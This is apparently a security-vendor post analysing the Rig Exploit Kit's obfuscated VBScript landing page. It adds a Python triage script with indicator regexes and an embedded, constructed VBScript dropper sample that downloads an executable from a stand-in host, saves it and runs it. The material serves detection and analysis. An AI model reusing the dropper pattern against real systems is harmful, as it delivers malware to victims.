Rig Exploit Kit remains active delivering malicious payloads
May 17, 2018
The Rig EK landing page is delivered as a gzip-compressed HTTP response.
The VBScript in the page is obfuscated with base64 encoding.
The base64-decoded VBScript shown below creates a shell32.dll in the %Temp% directory, fakes the system path, performs HTTP requests to a URL and writes the HTTP response out as [random].exe.
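As an added example (not code from the SonicWall post), the following Python script walks the same analysis steps offline: it gunzips a captured response body, pulls base64 runs out of VBScript blocks, decodes them and checks the result for the behaviours described above (drop into %Temp%, shell32.dll, PATH change, HTTP fetch, response saved as an .exe). The indicator regexes are my own heuristics, not SonicWall's signatures, and the embedded VBScript, the host example.invalid, the file name a1b2c3.exe and the Decode helper name are constructed stand-ins for a real landing page.

```python
from __future__ import annotations

import base64
import gzip
import re

# Assumption: these regexes are the author's own heuristics for the behaviours
# the post attributes to the decoded script; they are not SonicWall signatures.
INDICATORS = {
    "temp_dir":      re.compile(r"%temp%", re.I),
    "shell32_drop":  re.compile(r"shell32\.dll", re.I),
    "path_override": re.compile(r'\(\s*"PATH"\s*\)', re.I),
    "http_request":  re.compile(r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest", re.I),
    "exe_from_body": re.compile(r"ADODB\.Stream.*?SaveToFile.*?\.exe", re.I | re.S),
}

# A base64 run long enough to be an encoded script rather than an identifier.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
VBS_BLOCK_RE = re.compile(r"<script[^>]*vbscript[^>]*>(.*?)</script>", re.I | re.S)


def gunzip_body(body: bytes) -> bytes:
    """Decompress the body if it starts with the gzip magic, else pass it through."""
    return gzip.decompress(body) if body[:2] == b"\x1f\x8b" else body


def extract_vbscript(html: str) -> list[str]:
    """Return the contents of every <script ... vbscript ...> block."""
    return VBS_BLOCK_RE.findall(html)


def decode_base64_blobs(script: str) -> list[str]:
    """Decode every long base64 run that is both valid base64 and UTF-8 text."""
    blobs = []
    for m in B64_RE.finditer(script):
        try:
            blobs.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # a long identifier or binary junk, not an encoded script
    return blobs


def score(decoded: str) -> dict[str, bool]:
    """Map each indicator name to whether it fires on the decoded script."""
    return {name: bool(rx.search(decoded)) for name, rx in INDICATORS.items()}


def triage(body: bytes) -> list[dict]:
    """Pipeline: gunzip -> find VBScript blocks -> decode base64 -> score."""
    html = gunzip_body(body).decode("utf-8", errors="replace")
    findings = []
    for block in extract_vbscript(html):
        for decoded in decode_base64_blobs(block):
            findings.append({"decoded": decoded, "hits": score(decoded)})
    return findings


# --- Constructed sample (not a real Rig EK capture) -------------------------
# Stand-in VBScript performing the behaviours the post describes; the host
# example.invalid and the file name a1b2c3.exe are made up.
SAMPLE_VBS = r'''Set sh = CreateObject("WScript.Shell")
tmp = sh.ExpandEnvironmentStrings("%TEMP%")
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CreateTextFile(tmp & "\shell32.dll", True).Write "stub"
sh.Environment("Process")("PATH") = tmp & ";" & sh.Environment("Process")("PATH")
Set x = CreateObject("MSXML2.XMLHTTP")
x.Open "GET", "http://example.invalid/payload", False
x.Send
Set s = CreateObject("ADODB.Stream")
s.Type = 1: s.Open: s.Write x.responseBody
s.SaveToFile tmp & "\a1b2c3.exe", 2
sh.Run tmp & "\a1b2c3.exe"'''

SAMPLE_HTML = (
    '<html><body><script language="VBScript">\n'
    'Dim p: p = "' + base64.b64encode(SAMPLE_VBS.encode()).decode() + '"\n'
    "Execute Decode(p)\n"  # Decode: hypothetical base64 helper in the landing page
    "</script></body></html>"
)
SAMPLE_BODY = gzip.compress(SAMPLE_HTML.encode())  # the gzipped HTTP response body

if __name__ == "__main__":
    for finding in triage(SAMPLE_BODY):
        print(finding["hits"])
        print(finding["decoded"])
```

Run against a real capture by replacing SAMPLE_BODY with the raw response body; a block where all five indicators fire is a strong candidate for the dropper stage described above, while a single hit (for example only the HTTP object) is common in benign pages and should not be treated as a detection on its own.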
Rig EK also delivers Flash payloads that exploit Adobe Flash Player vulnerabilities. After successfully exploiting the system, it downloads further malicious payloads, ranging from Trojans to ransomware.
SonicWall Threat Research Lab is still seeing Rig Exploit Kit activity.
This can be mitigated by running the latest, patched versions of Flash Player and the browser, since the exploit kit relies on client software that has not been updated.
SonicWall Capture Threat Lab has created the signatures below to stop Rig EK before it drops its payloads:
- SPY Obfuscated-File vbs
- SPY Obfuscated-File js
- IPS Suspicious Rig EK